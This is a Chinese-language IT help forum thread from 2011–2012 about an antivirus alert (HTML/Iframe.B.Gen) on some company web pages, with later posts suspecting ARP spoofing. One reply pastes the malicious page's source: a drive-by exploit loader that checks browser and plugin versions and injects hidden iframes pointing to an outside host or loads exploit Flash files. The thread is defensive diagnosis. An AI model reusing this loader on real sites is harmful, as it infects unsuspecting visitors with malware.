shung0116
2011-12-13, 09:50 PM
請教大家
這是在瀏覽公司幾個網頁時所出現的狀況,會出現下列訊息
檔案:
http://184.22.7.194:808/ar/1.htm
威脅:
HTML/Iframe.B.Gen病毒
資料:
連線中止-已隔離
但這個問題主要都是發生在某個部門,別的部門是正常的,而該部門的電腦都使安裝winxp +sp3 +nod防毒軟體,而有打去資訊部確認,推測可能是網段或電腦中毒導致,但訊息看起來卻是該網頁有中毒,應該是主機問題
煩請大家指點一下
感謝
贊助商連結
bestpika
2011-12-14, 12:01 AM
看看原始碼就知道了...
<script src="nb.js"></script>
<script language='javascript'>
function hohoho1(){
document.writeln("<iframe src=\"http://i8n.fett9.in:808/ar/3.htm\" width=\"33\" height=\"1\"><\/iframe>");}
function hohoho2(){
document.writeln("<iframe src=\"2.htm\" width=\"33\" height=\"1\"><\/iframe>");}
function hohoho3(){
var take = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n"+
"<object width=\"550\" height=\"400\">\r\n"+
"<param name=\"movie\" value=\"done.swf\">\r\n"+
"<embed src=\"nbwm.swf\" width=\"550\" height=\"400\">\r\n"+
"<\/embed>\r\n"+
"<\/object>";
document.body.innerHTML="xxxx"+take;}
var nbMoon=ControlVersion();
var nbSunx=navigator.userAgent.toLowerCase();
var nbSeax=deconcept["SW"+"FObj"+"ectUt"+"il"]["get"+"PlayerVe"+"rsion"]();
if((nbMoon.indexOf('10.3.181.14')>0)||(nbMoon.indexOf('10.3.181.22')>0)||(nbMoon.indexOf('10.3.181.23')>0))
{
hohoho1();
}
else if((nbSeax.major<=10)&&(nbSunx.indexOf('msie 8.0')>0))
{
hohoho2();
}
else
{
document.write("<body onload=hohoho3();></body>");
}
</script>
shung0116
2011-12-22, 10:41 PM
但它有個現象:逛的網頁一樣,有部門有中毒,但大部份都沒有
也因此我是往區網中毒的方向來找
是否有其他前輩有其它的建議呢?
感謝
misol
2011-12-23, 05:23 PM
連線已逾時
伺服器 184.22.7.194 花了太久時間還是無回應。
該網站可能暫時無法使用或太過忙碌,請過幾分鐘後再試試。
若無法載入任何網站,請檢查您的網路連線狀態。
若電腦或網路被防火牆或 Proxy 保護,請確定
Firefox 被允許存取網路。
shung0116
2012-01-01, 10:13 PM
是否可能是ARP病毒的原因呢?
因為透過winarp watch看到下列畫面
http://home.educities.edu.tw/ektrontek/arp.jpg
顯示140.125.234.2(硬體防火牆IP)及140.125.234.254兩個MAC重覆,且滿多00:00:00:00:00:00 的MAC位址,而這些位址看起來不像區網的IP
感謝
bx2aa
2012-01-05, 10:52 AM
是否可能是ARP病毒的原因呢?
因為透過winarp watch看到下列畫面
http://home.educities.edu.tw/ektrontek/arp.jpg
顯示140.125.234.2(硬體防火牆IP)及140.125.234.254兩個MAC重覆,且滿多00:00:00:00:00:00 的MAC位址,而這些位址看起來不像區網的IP
感謝
這是你們資訊部的工作, 如果你要查, 你就去找 140.125.234.2 是誰?
有沒有人開 backtrack 通常工具都有了, 或是有人裝 ubuntu 安裝工具也很簡單.
還是 filddler2 這個以前玩 ASDM 因為網頁裡面的字有問題, 用 filddler2 去改成對的版本號, 要插入網頁改圖都可以, 軟體有附加教學影片.